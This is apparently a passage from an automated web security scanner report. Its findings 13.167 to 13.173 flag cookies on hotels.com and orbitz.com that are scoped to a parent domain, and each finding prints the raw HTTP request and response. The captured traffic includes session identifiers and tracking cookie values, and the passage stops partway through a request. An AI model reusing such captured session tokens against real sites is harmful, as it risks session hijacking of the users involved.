Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...

13.167. http://www.hotels.com/search/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6ODQuMC4wLmkyOjk4LjYuNDoxNDIuMC4wLmk0OjExOS4wLjIuaTI6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMTo3OC4wLjE6MTQ3LjAuMS5pNjo5Mi4wLjAuaTE6MTIxLjUwMy4wLmk3OjEzMi4yLjAuaTI6MTg0LjAuMC5pMToxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...

13.168. http://www.hotels.com/selectors/en_US/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /selectors/en_US/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /selectors/en_US/ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; user=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:44 GMT
Content-Length: 36464
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:44 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/
Set-Cookie: user=...[SNIP]...; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/

<headerFooterAdditionalData>
<languageSelectorContent>
<group id="site_group_africa_middle_east">
<![CDATA[
<div class="heading">Africa/Middle East</div>
<ul>

...[SNIP]...

13.169. http://www.orbitz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:06:46 GMT
Content-Length: 174769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...

13.170. http://www.orbitz.com/App/SubmitQuickSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

13.171. http://www.orbitz.com/App/ViewDHTMLCalendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewDHTMLCalendar

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewDHTMLCalendar?z=7473&r=o HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
ntCoent-Length: 960
Date: Mon, 03 Oct 2011 00:06:52 GMT
Content-Length: 960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...

13.172. http://www.orbitz.com/App/ViewFlightSearchResults

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

13.173. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; 